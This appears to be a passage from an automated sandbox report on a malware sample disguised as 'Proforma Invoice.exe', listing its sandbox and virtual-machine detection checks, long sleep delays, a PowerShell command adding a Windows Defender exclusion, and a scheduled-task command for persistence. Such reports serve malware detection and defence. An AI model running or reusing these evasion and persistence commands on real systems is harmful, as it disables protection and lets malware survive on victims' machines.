                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: 00000000.00000002.417720343.0000000002C24000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.416609324.00000000029D7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Proforma Invoice.exe PID: 7152, type: MEMORYSTR
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: Proforma Invoice.exe, 00000000.00000002.417720343.0000000002C24000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.exe, 00000000.00000002.416609324.00000000029D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: Proforma Invoice.exe, 00000000.00000002.417720343.0000000002C24000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.exe, 00000000.00000002.416609324.00000000029D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
                    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7156Thread sleep time: -47882s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2508Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 6640Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 6648Thread sleep count: 9495 > 30Jump to behavior
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9281Jump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeWindow / User API: threadDelayed 9495Jump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeThread delayed: delay time: 47882Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: Proforma Invoice.exe, 00000000.00000002.418665405.0000000004169000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.exe, 00000000.00000002.426347057.000000000ADA0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: O3OXnn329t8NqEmU6p6
                    Source: Proforma Invoice.exe, 00000000.00000002.416609324.00000000029D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                    Source: Proforma Invoice.exe, 00000000.00000002.416609324.00000000029D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                    Source: Proforma Invoice.exe, 00000000.00000002.416609324.00000000029D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
                    Source: Proforma Invoice.exe, 00000008.00000002.646996145.0000000006850000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: Proforma Invoice.exe, 00000000.00000002.416609324.00000000029D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 8_2_067DA4C0 LdrInitializeThunk,8_2_067DA4C0
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Adds a directory exclusion to Windows Defender
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ebJpPhiwjcAviB.exe
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ebJpPhiwjcAviB.exeJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ebJpPhiwjcAviB.exeJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ebJpPhiwjcAviB" /XML "C:\Users\user\AppData\Local\Temp\tmp8D30.tmpJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess created: C:\Users\user\Desktop\Proforma Invoice.exe C:\Users\user\Desktop\Proforma Invoice.exeJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Users\user\Desktop\Proforma Invoice.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
